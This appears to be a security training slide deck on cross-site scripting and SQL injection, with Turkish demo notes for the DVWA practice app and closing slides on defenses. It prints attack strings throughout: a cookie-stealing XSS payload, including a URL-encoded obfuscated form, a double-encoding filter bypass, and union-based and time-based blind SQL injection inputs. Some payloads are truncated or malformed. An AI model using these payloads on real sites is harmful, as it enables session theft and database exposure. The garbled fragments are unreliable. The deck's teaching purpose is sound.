1. Cross Site Scripting & SQL injection
Hakan Tolgay

2. Input/Output handling - SOP
SOP – Same Origin Policy
SOP, is a security measure used in Web browser programming languages such as JavaScript and Ajax to protect the confidentiality and integrity of information.
Same Origin Policy prevents a web site's scripts from accessing and interacting with scripts used on other sites.
To do that
Protocol
Domain name
Port

3. Input/Output handling - SOP
example.com.tr/admin/page.aspx
example.com.tr/admin/page.aspx

4. Input/Output handling – Whats the problem
The typical problem in web applications is mixing of data and the malicious code.
Input fields of a web application can be exploited by hackers unless required checks are made.
Input fields should not be seen as simple text boxes.

5. What is Javascript
JavaScript is a programming language used to make web pages interactive.
It runs on your visitor's computer and doesn't require constant downloads from website.
JavaScript is often used to create polls and quizzes.

7. Cross Site Scripting (XSS) – Introduction
XSS is a vulnerability that allows an attacker to run arbitrary JavaScript in the context of the vulnerable website.
Exploit in Javascript
Is not depended on a specific platform or language

8. XSS – Introduction The target of XSS attack is other users.
In the 3rd place of OWASP top 10 security risk list (OWASP top is available in the training materials)
Thus, basically
Cross Site Scripting is when attackers use vulnerabilities in your web application to distribute malicious scripts to other users (which then run other users web browsers)

9. Types of XSS Reflected XSS Stored XSS DOM Based XSS
Link in other website or
Stored XSS
Forum, bulletin board, feedback form
DOM Based XSS
PDF Adobe Reader , FLASH player

10. Reflected XSS

11. Reflected XSS
Say that the welcome page is vulnerable to a XSSS attack since a welcome message can be displayed on the welcome page with the user's name passed as a parameter:
Pass the following Javascript code as the name parameter, in order to redirect the user to a page atacker controls
<SCRIPT> document.location=' </SCRIPT>
The above code retrieves the user's cookies and sends them as parameters to a CGI script. The following code passed as a parameter would be too visible:
=' bin/script.cgi?'+document.cookie</SCRIPT>
However, coding the URL makes it possible to disguise the attack:
6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%5c%27%68%74%74%70%3a%2f%2f%73%69%74% 65%2e%70%69%72%61%74%65%2f%63%67%69%2d%62%69%6e%2f%73%63%72%69%70%74%2e% 63%67%69%3f%5c%27%20%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f% 53%43%52%49%50%54%3e

12. Reflected XSS

13. Reflected XSS – DEMO ===REFLECTED XSS DEMO===
DVWA uygulamasının (Username:admin, Password:admin) 'XSS Reflected' bölümünde demo gerçekleştirilir.
Input alanına <abc> gibi bir değer girilir.
* Yansıtılan mesajda görülmemesi üzerine sayfanın kaynak koduna bakılır, burada değerin var olduğu görülür;
* <abc>nin HTML tag olarak yorumlandığı anlaşılır.
* <script>alert(document.cookie)</script> ile cookie'nin görüntülenmesi sağlanır.

14. Stored XSS
JavaScript supplied by the attacker is stored by the website (e.g. in a database)
Doesn’t require the victim to supply the JavaScript somehow, just visit the exploited web page
More dangerous than Reflected XSS

15. Stored XSS – DEMO ===STORED XSS DEMO===
DVWA uygulamasının 'XSS stored' bölümünde demo gerçekleştirilir.
Mesaj alanına <abc> girerek mesaj bölümünde görüntülenmediği ama sayfanın kodunda var olduğu görülür.
Mesaj alanına <script>alert('XSS')</script> girilerek sayfanın her ziyaretinde bu mesajın alındığı görülür.

16. XSS – What can you do with JavaScript
Pop-up alerts and prompts
Access cookies/session tokens
Detect installed programs
Detect browser history
Capture keystrokes (and other trojan functionality)
Port scan the local network
Redirect to a different web site
Determine if they are logged on to a particular site
Capture clipboard content
Detect if the browser is being run in a virtual machine
Rewrite the status bar
Exploit browser vulnerabilities
Launch executable files (in some cases)

17. XSS - Defense
What can be done?

18. Defense - Blacklisting approach
Blacklist has items which shouldn’t have
Is fast to set up, but can be bypassed more easily by a skilled attacker.
Do not use "blacklist" validation to detect XSS in input or to encode output.
Searching for and replacing just a few characters ("<" ">" and other similar characters or phrases such as “script”) is weak and has been attacked successfully.
Even an unchecked “<b>” tag is unsafe in some contexts. XSS has a surprising number of variants that make it easy to bypass blacklist validation.

19. Defense - Whitelisting approach
Whitelist has items which should have
Whitelisting allows for a much stronger security solution than blacklisting but comes with a steep learning curve. Once mastered, though, whitelisting is very effective at stopping XSS attacks.

20. Defense - Encoding/Decoding
Encoding variable output substitutes HTML markup with alternate representations called entities
By using double encoding it’s possible to bypass security filters that only decode user input once.

21. Encoding Demo
<script>alert("XSS var")</script>

22. Defense - Encoding/Decoding - Example
<script>alert('XSS')</script>
Web application can have a character filter which prohibits characters such as “< “, “>” and “/”, since they are used to perform web application attacks.
The attacker could use a double encoding technique to bypass the filter and exploit the client’s session. The encoding process for this Java script is:
Finally, the malicious double encoding code is:
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E

23. Defense
Never Insert Untrusted Data Except in Allowed Locations in OWASP XSS prevention list rules
Check

24. What is SQL Structured Query Language
A Language designed for managing data held in databases
Examples:
SELECT * FROM usersTable WHERE uname = ‘hakan’
SELECT isbn, title, price FROM Book WHERE price > ORDER BY title;

25. What is SQL – more example
SELECT Name, Surnamme FROM Custome WHERE Age > 30;
Customer
Name
Surname
Age
Sex
Lisa
Becker 37 F
Erwin
Visser 31 M
Lara
Martini 24
Alan
Newman 29
Result Set

26. SQL Injection
Sending parameters directly from application to the database server can cause unauthorized queries.
#1 at top 10 security risk list

27. SQL Injection
statement = "SELECT * FROM users WHERE name ='" + userName + "';
' or '1'='1
SELECT * FROM users WHERE name = '' OR '1'='1';

28. SQL Injection – DEMO ===SQLi DEMO===
DVWA uygulamasının 'SQL Injection' bölümünde demo yapılır.
Security Level'ın LOW olduğundan emin olunmalı.
User ID alanına 1' göndererek alınan hata gözlenir.
* 1' or 1=1 -- (iki tireden sonra bir boşluk var!) göndererek tüm kayıtların listelenmesi sağlanır.
* 1' union select '', '' -- göndererek sorgunun select kısmındaki kolon sayısı tespit edilir (Bu demoda 2 kolon).
* 2' union select version(), database() -- göndererek veritabanı ile ilgili bilgiler elde edilir.

30. SQL Injection – Blind injection
=== SQLi BLIND DEMOSU ===
DVWA uygulaması "SQL Injection (Blind)" bölümünde demo gerçekleştirilir.
"1'" gönderilerek bir sonuç dönmediği gözlenir; 1000 göndererek olmayan bir ID için yine bir sonuç dönmediği gözlenir.
- Yani, tek tırnak işaretini yorumladı mı, sanitize mi etti, yanıta bakarak anlayamıyoruz.
* "2' order by 1 #" gönderilerek sonuç döndüğü görülür.
- Sonuç dönmesi, 2'den sonrasını ignore ettiği anlamına da gelebilir. Bunun sağlamasını yapmak lazım:
- "2' order by 3 #" gönderilerek sonuç dönmediği görülür.
+ Hem blindSQLi olduğunu anladık, hem kolon sayısının 2 olduğunu anladık.
* "2' union sleep(5), null #" gönderilerek sonucun 5 saniye sonra döndüğü gözlemlenir => Time-based blind SQLi.

31. SQL Injection – Defense
Use parameterized queries
For Java use PreparedStatement
For c# use Parameters.Add
Check OWASP SQL injection cheat sheet

32. Thank You